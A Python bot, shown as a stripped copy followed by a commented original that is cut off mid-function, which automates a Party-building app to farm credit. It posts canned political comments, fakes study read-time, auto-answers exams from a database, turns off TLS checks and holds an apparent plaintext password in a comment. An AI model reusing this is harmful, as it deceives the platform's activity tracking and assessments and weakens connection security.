self.debug = True
self.session = requests.session()
self.appid = appid
self.headers = {'User-Agent':
'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'
, 'header_version': '80', 'system': 'android', 'Connection':
'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}
self.token = self.getToken()
time.sleep(0.1)
self.thumbPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Learn/List',
'https://mapi.dangjianwang.com/v3_1/Activities/List',
'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])
self.thumbPages = [i[1] for i in self.thumbPageList]
time.sleep(0.1)
self.helpPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Help/List'])
self.helpPages = [i[1] for i in self.helpPageList]
self.helpResults = {}
time.sleep(0.1)
self.studyPageList = self.getPagesII(urls=[
'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])
self.studyPages = [i[1] for i in self.studyPageList]
time.sleep(0.1)
self.studyRsults = {}
self.thumbedPages = []
self.thumbResults = {}
self.helpedPages = []
self.multiThumbed = []
self.viewsResults = []
self.examC19Info = []
self.examlist = []
self.qaList = []
def getCurrentTime(self):
return datetime.datetime.now().strftime('%H:%M:%S')
def writeErr2File(self, err):
path = self.logFilePath
fullPath = '{}{}err.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, err))
print('err已经写入{}'.format(fullPath))
def writeLog2File(self, log):
path = self.logFilePath
fullPath = '{}{}logs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, log))
print('log已经写入{}'.format(fullPath))
def writeThumb2File(self, id):
path = self.thumbedFilePath
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write(',{}'.format(id))
print('点赞记录已经写入{}'.format(fullPath))
def getThumbFromFile(self):
"""
:return: 文件中id组成的列表
"""
path = self.thumbedFilePath
inFileList = []
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(fullPath):
return fullPath
with open(fullPath, 'r') as f:
inFileList.extend(list(set(f.readlines()[0].split(','))))
with open(fullPath, 'w') as f1:
f1.write(','.join(sorted(inFileList)))
return inFileList
def getExcuteTimes(self):
"""
返回点赞等自动执行的次数的字典
:return:
"""
excuteTimes = {}
credInfo = self.getCredItinfo()
print(credInfo)
currentScore = credInfo[0]
thumbScore = credInfo[1]['信息评论'].split('/')[0]
thumbExcuteTimes = 10 - int(thumbScore)
excuteTimes.update({'thumb': thumbExcuteTimes})
helpScore = credInfo[1]['互助广场回答'].split('/')[0]
helpExctuteTimes = 2 - int(helpScore)
excuteTimes.update({'help': helpExctuteTimes})
viewScore = credInfo[1]['党员视角发布'].split('/')[0]
viewExcuteTimes = int((4 - int(viewScore)) / 2)
excuteTimes.update({'view': viewExcuteTimes})
examScore = credInfo[1]['在线知识竞答'].split('/')[0]
examExcuteTimes = int((4 - int(examScore)) / 2)
excuteTimes.update({'exam': examExcuteTimes})
flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]
['在线阅读学习资料'].split('/')[0])
flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]
['学习资料写体会'].split('/')[0])
examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0
excuteTimes.update({'study': examExcuteTimes})
return excuteTimes
def getToken(self):
"""
获得一个连接的token
每个连接都需要使用到
:return:
"""
data = {'appid': self.appid, 'username': self.username, 'password':
self.password}
longinurl = 'https://mapi.dangjianwang.com/v3_1/login'
r = self.session.post(url=longinurl, data=data, verify=False)
rjson = r.json()
if rjson['code'] == '200':
return rjson['token']
else:
print('token 获得失败')
return None
def getRJson(self, url):
data = {'token': self.token, 'appid': self.appid}
return self.session.post(url=url, data=data, verify=False).json()
def getUserInfo(self):
"""
获得一大串用户的信息,暂时没用
:return:
"""
infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'
return self.getRJson(url=infoUrl)
def getCredItinfoToday(self):
"""
获得人员当前的得分等级参数
:return:
"""
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
info = self.getRJson(url=creditInfourl)
fullScore = info['data']['full']
gainScore = info['data']['gain']
currentLevel = info['data']['level']
username = info['data']['name']
ret = {'fullScore': fullScore, 'gainScore': gainScore,
'currentLevel': currentLevel, 'username': username}
return ret
def getCredItinfo(self):
"""
获得用户的今日积分状态
可用来判断是否需要再继续流程
数据如下
('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])
:return:(haved_credit, credit_detail)
"""
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
haved_credit = 0
credit_detail = {}
info = self.getRJson(url=creditInfourl)
for k, v in info.items():
if k == 'data':
for k2, v2 in v.items():
if k2 == 'haved_credit':
haved_credit = v2
if k2 == 'credit_detail':
for i in v2:
credit_detail.update({i['title']: i['score']})
return haved_credit, credit_detail
def getPages(self, urls):
pages = []
for url in urls:
data = self.getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
pages.append((i['title'], i['id']))
return pages
def getPagesII(self, urls):
def getRJson(url):
data = {'token': self.token, 'appid': self.appid, 'type_id':
'791', 'page_index': '1'}
return self.session.post(url=url, data=data, verify=False).json()
pages = []
for url in urls:
data = getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
pages.append((i['name'], i['id']))
return pages
def doThumb(self, id):
"""
点赞函数,操作与id对应的页面
每次记录对应的信息到文件
:return:
"""
contents = ['关注', '关注!', '关注!!']
data = {'id': id, 'comment': random.choice(contents), 'token': self
.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
print(rjson)
if rjson['code'] == '1003':
self.token = self.getToken()
elif rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.thumbedPages.append(id)
for i in list(set(self.thumbPageList)):
if id == i[1]:
temp = {'title': i[0]}
self.thumbResults.update(temp)
log = '信息点赞:\n主题: {}\n提交:{}'.format(i[0], data[
'comment'])
detail = '{} 主题:{}\n回复:{}\n'.format(self.
getCurrentTime(), i[0], data['comment'])
write2File(self, './results/', 'result.txt', log)
thumbInfo = {'title': i[0], 'reply': data['comment']}
self.thumbPages.remove(id)
self.writeThumb2File(id=id)
return detail, thumbInfo
elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':
print('因评论过快,等待一段时间')
time.sleep(20)
else:
print('rjson', rjson)
self.thumbedPages.remove(id)
self.writeThumb2File(id=id)
log = '点赞:{}'.format(rjson)
self.writeLog2File(log)
print(log)
time.sleep(10)
def doHelp(self, id, callback=None):
"""
互助功能
:param id:
:return:
"""
detail = ''
helpInfo = None
log = ''
content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',
'要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']
data = {'id': id, 'content': random.choice(content), 'token': self.
token, 'appid': self.appid}
print(data)
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.helpedPages.append(id)
self.helpPages.remove(id)
for i in self.helpPageList:
if id == i[1]:
curTime = self.getCurrentTime()
self.helpResults.update({'title': id[0]})
log = '互助:\n主题: {}\n提交内容: {}'.format(i[0], rjson[
'comment'])
write2File(self, './results/', 'result.txt', log)
detail = '{} 主题: {}\n提交内容: {}\n'.format(curTime, i[
0], rjson['comment'].strip())
helpInfo = {'title': i[0], 'reply': rjson['comment']}
else:
pass
else:
pass
log = '帮助:{}'.format(rjson)
self.writeLog2File(log)
print(log)
return detail, log, helpInfo
def doView(self):
"""
党员视角发布功能
:return:
"""
content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']
data = {'content': random.choice(content), 'token': self.token,
'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.viewsResults.append(1)
else:
pass
log = '党员视角:{}'.format(rjson)
detail = '{} 党员视角:\n发布内容:{}\n'.format(self.getCurrentTime(), rjson[
'data']['content'])
publicContent = rjson['data']['content']
return detail, publicContent
def doStudy(self, mid):
"""
前三个post函数的响应的三个请求
get用来获得填写的内容
最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。
:param mid:
:return:
"""
interval = 60 * 5 + 5
def post1():
data = {'mid': mid, 'token': self.token, 'appid': self.appid}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post1:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post2():
data = {'token': self.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post2:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post3():
data = {'mid': mid, 'token': self.token, 'appid': self.appid}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习post3:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def get1():
url = (
'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'
.format(self.token, mid))
rjson = self.session.get(url=url)
text = rjson.content
soup = BeautifulSoup(text, 'html.parser')
retContents = []
for div in soup.find_all('p'):
p = div.text.strip()
retContents.append(p if 100 > len(p) < 200 else p[0:200])
return random.choice(retContents)
def recordFeeling(content=None):
if not content:
content = (
'伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'
)
data = {'mid': mid, 'token': self.token, 'appid': self.appid,
'content': content}
commitUrl = (
'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习recordFeeling:{}'.format(rjson)
self.writeLog2File(log)
print('in recordFeeling')
print(log)
if rjson['code'] == '200':
return {'content': content}
elif rjson['code'] == '1120':
addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',
'人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',
'民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']
return recordFeeling(content='{}\n{}'.format(content,
random.choice(addtion)))
else:
return None
def readTime():
data = {'mid': mid, 'token': self.token, 'appid': self.appid,
'time': interval}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'
rjson = self.session.post(url=commitUrl, data=data, verify=False
).json()
log = '学习readTime:{}'.format(rjson)
self.writeLog2File(log)
print(log)
post1()
time.sleep(1)
post2()
time.sleep(1)
post3()
time.sleep(1)
content = get1()
time.sleep(1)
count = 0
print('开始学习请稍后')
for i in range(interval):
count += 1
if count % 30 == 0:
print('已用时{}秒'.format(count))
time.sleep(1)
print('填写的学习体会', content)
self.studyRsults.update(recordFeeling(content=content))
time.sleep(1)
readTime()
time.sleep(1)
pass
def doExam(self):
"""
:param self:
:return:
"""
ids = []
data = {'page': '1', 'page_size': '20', 'token': self.token,
'appid': self.appid}
examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'
rjson = self.session.post(url=examlistUrl, data=data, verify=False
).json()
time.sleep(0.3)
print('*' * 99)
data = {'page': '1', 'page_size': '20', 'token': self.token,
'appid': self.appid}
banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'
rjson = self.session.post(url=banklistUrl, data=data, verify=False
).json()
for i in rjson['data']:
tem = i['bank_name'], i['id']
self.examlist.append(tem)
if i['bank_name'] == '十九大报告100题(单选)':
temp = {'title': i['bank_name'], 'detail': i['detail'],
'id': i['id']}
self.examC19Info.append(temp)
time.sleep(0.3)
print('*' * 99)
data = {'bank': '6', 'token': self.token, 'appid': self.appid}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
aa = rjson['data']
paper = aa['id']
for i in aa['questions']:
temp = {'id': i['id'], 'content': i['content']}
ids.append(temp)
print('*' * 99)
time.sleep(0.5)
answers = []
for i in ids:
correctAnswer = Qa.objects.filter(question__contains=i['content'])[
0]
answerText = correctAnswer.answerText
answer = correctAnswer.answer
temp = {'index': i['id'], 'answer': answer}
qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}
self.qaList.append(qa)
print(qa, i['content'])
answers.append(temp)
time.sleep(1)
hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,
'answers': json.dumps(answers)}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'
rjson = self.session.post(url=commitUrl, data=hdata, verify=False
).json()
print(rjson)
print(self.examlist)
print(self.examC19Info)
print(self.qaList)
def getAnswerInfo(self):
"""
获得答题的结果与正确率
:return:
"""
data = {'token': self.token, 'appid': self.appid, 'page_size': '20',
'page_index': 'page_index'}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
)
print(rjson)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import json
import os, django
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dangjianyun.settings")# project_name 项目名称
django.setup()
from dangjiansite.djfuncs import *
import os
import datetime
import requests
import time
import urllib3
import base64
import csv
import random
from bs4 import BeautifulSoup
from dangjiansite.models import *
class Runner():
# def __init__(self, appid='TJZHDJ01', username='024549', password='Aa1234'):
def __init__(self, appid='TJZHDJ01', username='', password=''):
urllib3.disable_warnings()#屏蔽ssl告警
self.currentTime = datetime.datetime.now().strftime("%H:%M:%S")
self.username = username
self.password = password
self.thumbedFilePath = './lib/'.format(username)
self.logFilePath = './log/'.format(username)
self.errFilePath = './err/'.format(username)
# self.thumbedFileList = self.getThumbFromFile()
self.thumbedFileList = []
self.debug = True
self.session = requests.session()
self.appid = appid#应该是本设备安装app的id 等换个设备试一下就知道了
self.headers ={
'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)',
'header_version': '80',
'system': 'android',
'Connection': 'Keep-Alive',
'Host': 'mapi.dangjianwang.com',
}
self.token = self.getToken()
time.sleep(0.1)
self.thumbPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Learn/List',
'https://mapi.dangjianwang.com/v3_1/Activities/List',
'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'
])
self.thumbPages = [i[1] for i in self.thumbPageList]
time.sleep(0.1)
self.helpPageList = self.getPages(urls=['https://mapi.dangjianwang.com/v3_1/Help/List', ])
self.helpPages = [i[1] for i in self.helpPageList]
self.helpResults = {}
time.sleep(0.1)
self.studyPageList = self.getPagesII(urls=['https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])
self.studyPages = [i[1] for i in self.studyPageList]
time.sleep(0.1)
self.studyRsults = {}
self.thumbedPages = []
self.thumbResults = {}
self.helpedPages = []
self.multiThumbed = []#考虑最后要写入文件之中
self.viewsResults = []
self.examC19Info = []
self.examlist = []
self.qaList = []
def getCurrentTime(self):
return datetime.datetime.now().strftime("%H:%M:%S")
def writeErr2File(self, err):
path = self.logFilePath
fullPath = '{}{}err.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, err))
print('err已经写入{}'.format(fullPath))
def writeLog2File(self, log):
path = self.logFilePath
fullPath = '{}{}logs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, log))
print('log已经写入{}'.format(fullPath))
def writeThumb2File(self, id):
path = self.thumbedFilePath
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write(',{}'.format(id))
print('点赞记录已经写入{}'.format(fullPath))
def getThumbFromFile(self):
'''
:return: 文件中id组成的列表
'''
path = self.thumbedFilePath
inFileList = []
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(fullPath):
return fullPath
with open(fullPath, 'r') as f:
inFileList.extend(list(set(f.readlines()[0].split(','))))
# print('getThumbFormFile', inFileList)
with open(fullPath, 'w') as f1:
f1.write(','.join(sorted(inFileList)))
return inFileList
def getExcuteTimes(self):
'''
返回点赞等自动执行的次数的字典
:return:
'''
excuteTimes = {}
credInfo = self.getCredItinfo()
print(credInfo)
currentScore = credInfo[0]
# 点赞次数
thumbScore = credInfo[1]['信息评论'].split('/')[0]
thumbExcuteTimes = 10 - int(thumbScore)
excuteTimes.update({'thumb': thumbExcuteTimes})
# 帮助次数
helpScore = credInfo[1]['互助广场回答'].split('/')[0]
helpExctuteTimes = 2 - int(helpScore)
excuteTimes.update({'help': helpExctuteTimes})
# 党员视角发布次数
viewScore = credInfo[1]['党员视角发布'].split('/')[0]
viewExcuteTimes = int((4 - int(viewScore)) / 2)
excuteTimes.update({'view': viewExcuteTimes})
# 在线知识竞答次数
examScore = credInfo[1]['在线知识竞答'].split('/')[0]
examExcuteTimes = int((4 - int(examScore)) / 2)
excuteTimes.update({'exam': examExcuteTimes})
# 学习次数
flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]['在线阅读学习资料'].split('/')[0])
flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]['学习资料写体会'].split('/')[0])
examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0
excuteTimes.update({'study': examExcuteTimes})
return excuteTimes
def getToken(self):
'''
获得一个连接的token
每个连接都需要使用到
:return:
'''
data = {
'appid': self.appid,
'username': self.username,
'password': self.password,
}
longinurl = 'https://mapi.dangjianwang.com/v3_1/login'
r = self.session.post(url=longinurl, data=data, verify=False)
rjson = r.json()
# print(type(rjson))
# print(rjson)
if rjson['code'] == '200':
return rjson['token']
else:
print('token 获得失败')
return None
def getRJson(self, url):
data={
'token': self.token,
'appid': self.appid
}
return self.session.post(url=url, data=data, verify=False).json()
def getUserInfo(self):
'''
获得一大串用户的信息,暂时没用
:return:
'''
infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'
return self.getRJson(url=infoUrl)
def getCredItinfoToday(self):
'''
获得人员当前的得分等级参数
:return:
'''
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
info = self.getRJson(url=creditInfourl)
fullScore = info['data']['full']
gainScore = info['data']['gain']
currentLevel = info['data']['level']
username = info['data']['name']
ret = {
'fullScore': fullScore,
'gainScore': gainScore,
'currentLevel': currentLevel,
'username': username,
}
return ret
def getCredItinfo(self):
'''
获得用户的今日积分状态
可用来判断是否需要再继续流程
数据如下
('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])
:return:(haved_credit, credit_detail)
'''
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
haved_credit = 0
credit_detail = {}
info = self.getRJson(url=creditInfourl)
for k, v in info.items():
if k == 'data':
for k2, v2 in v.items():
if k2 == 'haved_credit':
haved_credit = v2
if k2 == 'credit_detail':
for i in v2:
credit_detail.update({i['title']: i['score']})
return (haved_credit, credit_detail)
def getPages(self, urls):
pages = []
for url in urls:
data = self.getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
# pages.append({'pageId': i['id'], 'pageTitle': i['title']})
# pages.append(i['id'])
pages.append((i['title'], i['id']))
return pages
def getPagesII(self, urls):
def getRJson(url):
data = {
'token': self.token,
'appid': self.appid,
'type_id': '791',
'page_index': '1',
}
return self.session.post(url=url, data=data, verify=False).json()
pages = []
for url in urls:
data = getRJson(url=url)
for k, v in data.items():
# print(k, v)
if k == 'data':
for i in v:
# pages.append({'pageId': i['id'], 'pageTitle': i['title']})
# pages.append(i['id'])
pages.append((i['name'], i['id']))
return pages
def doThumb(self, id):
'''
点赞函数,操作与id对应的页面
每次记录对应的信息到文件
:return:
'''
contents = [
'关注',
'关注!',
'关注!!']
data = {
'id': id,
'comment': random.choice(contents),
'token': self.token,
'appid': self.appid,
}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
print(rjson)
if rjson['code'] == '1003':
self.token = self.getToken()
elif rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.thumbedPages.append(id)
# print(self.thumbPageList)
# print(len(self.thumbPageList), len(list(set(self.thumbPageList))))
for i in list(set(self.thumbPageList)):
if id == i[1]:
temp = {'title': i[0]}
self.thumbResults.update(temp)
log = '信息点赞:\n主题: {}\n提交:{}'.format(i[0], data['comment'])
detail = '{} 主题:{}\n回复:{}\n'.format(self.getCurrentTime(), i[0], data['comment'])
write2File(self, './results/', 'result.txt', log)
thumbInfo = {'title': i[0], 'reply': data['comment']}
self.thumbPages.remove(id)
self.writeThumb2File(id=id)
return (detail, thumbInfo)
elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':
print('因评论过快,等待一段时间')
time.sleep(20)
else:
print('rjson', rjson)
# self.multiThumbed.append(id)
self.thumbedPages.remove(id)#不成功的时候也要去掉不然总会选到
self.writeThumb2File(id=id)
log = '点赞:{}'.format(rjson)
self.writeLog2File(log)
print(log)
time.sleep(10)
def doHelp(self, id, callback=None):
'''
互助功能
:param id:
:return:
'''
detail = ''
helpInfo = None
log = ''
content = [
'把党的政治建设摆在首位!',
'不忘初心,牢记使命!',
'发展史第一要务,人才是第一资源,创新是第一动力。',
'要把党的领导贯彻到依法治国全过程和各方面',
'毫不动摇坚持中国共产党领导',]
data = {
'id': id,
'content': random.choice(content),
'token': self.token,
'appid': self.appid,
}
print(data)
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.helpedPages.append(id)
self.helpPages.remove(id)
#记录成功的到result
for i in self.helpPageList:
if id == i[1]:
curTime = self.getCurrentTime()
# print('('*88)
# print(curTime)
self.helpResults.update({'title': id[0]})
log = '互助:\n主题: {}\n提交内容: {}'.format(i[0], rjson['comment'])
write2File(self, './results/', 'result.txt', log)
# #写入数据库
detail = '{} 主题: {}\n提交内容: {}\n'.format(curTime, i[0], rjson['comment'].strip())
helpInfo = {'title': i[0], 'reply': rjson['comment']}
else:
pass
else:
pass
log = '帮助:{}'.format(rjson)
self.writeLog2File(log)
print(log)
return (detail, log, helpInfo)
def doView(self):
'''
党员视角发布功能
:return:
'''
content = [
'全面的小康,覆盖的人口要全面,是惠及全体人民的小康。',
'不忘初心,牢记使命,坚持终身学习!']
data = {
'content': random.choice(content),
'token': self.token,
'appid': self.appid,
}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.viewsResults.append(1)
# self.viewsResults.append(id)
else:
pass
log = '党员视角:{}'.format(rjson)
detail = '{} 党员视角:\n发布内容:{}\n'.format(self.getCurrentTime(), rjson['data']['content'])
publicContent = rjson['data']['content']
# print(detail)
# self.writeLog2File(log)
# print('党员视角'*12)
# print(id)
# print(log)
# print('党员视角' * 12)
return (detail, publicContent)
def doStudy(self, mid):
'''
前三个post函数的响应的三个请求
get用来获得填写的内容
最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。
:param mid:
:return:
'''
interval = 60 * 5 + 5
def post1():
data = {
'mid': mid,
'token': self.token,
'appid': self.appid,
}
commitUrl = 'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
# print(rjson)
log = '学习post1:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post2():
data = {
'token': self.token,
'appid': self.appid,
}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
# print(rjson)
log = '学习post2:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def post3():
data = {
'mid': mid,
'token': self.token,
'appid': self.appid,
}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
# print(rjson)
log = '学习post3:{}'.format(rjson)
self.writeLog2File(log)
print(log)
def get1():
url = 'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'.format(self.token, mid)
rjson = self.session.get(url=url)
text = rjson.content
soup = BeautifulSoup(text, 'html.parser')
retContents = []
for div in soup.find_all('p'):
p = div.text.strip()
retContents.append(p if 100 > len(p) < 200 else p[0:200])
return random.choice(retContents)
def recordFeeling(content=None):
if not content:
content = '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,' \
'是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。' \
'邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'
data = {
'mid': mid,
'token': self.token,
'appid': self.appid,
'content': content
}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
# print(rjson)
log = '学习recordFeeling:{}'.format(rjson)
self.writeLog2File(log)
print('in recordFeeling')
print(log)
if rjson['code'] == '200':
return {'content': content}
elif rjson['code'] == '1120':
addtion = [
'我们必须坚定不移,任何时候任何情况下都不能动摇',
'人民有信心,国家才有未来,国家才有力量。',
'新时代,属于自强不息、勇于创造的奋斗者。',
'民主政治建设有序推进,依法治市迈出新步伐。',
'一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。',
]
return recordFeeling(content= '{}\n{}'.format(content, random.choice(addtion)))
else:
return None
#记录回复的心得
def readTime():
data = {
'mid': mid,
'token': self.token,
'appid': self.appid,
'time': interval,
}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
# print(rjson)
log = '学习readTime:{}'.format(rjson)
# self.studyRsults.update({'学习readTime', rjson})
self.writeLog2File(log)
print(log)
post1()
time.sleep(1)
post2()
time.sleep(1)
post3()
time.sleep(1)
content = get1()
time.sleep(1)
# time.sleep(interval)
count = 0
print('开始学习请稍后')
for i in range(interval):
count += 1
# print(i + 1)
if count % 30 == 0:
print('已用时{}秒'.format(count))
time.sleep(1)
# time.sleep(5)
print('填写的学习体会', content)
self.studyRsults.update(recordFeeling(content=content))
time.sleep(1)
readTime()
time.sleep(1)
pass
def doExam(self):
'''
:param self:
:return:
'''
ids = []
data = {
'page': '1',
'page_size': '20',
'token': self.token,
'appid': self.appid,
}
examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'
rjson = self.session.post(url=examlistUrl,
data=data,
verify=False).json()
# print(rjson)
# for i in rjson['data']:
# print(i)
time.sleep(0.3)
#########################################################
print('*' * 99)
data = {
'page': '1',
'page_size': '20',
'token': self.token,
'appid': self.appid,
}
banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'
rjson = self.session.post(url=banklistUrl,
data=data,
verify=False).json()
# print(rjson)
for i in rjson['data']:
tem = (i['bank_name'], i['id'])
self.examlist.append(tem)
if i['bank_name'] == '十九大报告100题(单选)':
# if i['bank_num'] == '65':
temp = {
'title': i['bank_name'],
'detail': i['detail'],
'id': i['id'],
}
self.examC19Info.append(temp)
# print(self.examC19Info)
# print(self.examlist)
time.sleep(0.3)
#########################################################
print('*' * 99)
data = {
'bank': '6',
'token': self.token,
'appid': self.appid,
}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
# print(rjson)
aa = rjson['data']
paper = aa['id']
for i in aa['questions']:
temp = {'id': i['id'], 'content': i['content']}
ids.append(temp)
#########################################################
print('*' * 99)
time.sleep(0.5)
# 以下答题交卷
answers = []
# 先得到答案
for i in ids:
# 丛书据库获得答案
correctAnswer = Qa.objects.filter(question__contains=i['content'])[0]
answerText = correctAnswer.answerText
answer = correctAnswer.answer
#从文键获得答案
# answerText = getAnswer(i['content'])[2]
# answer = getAnswer(i['content'])[1]
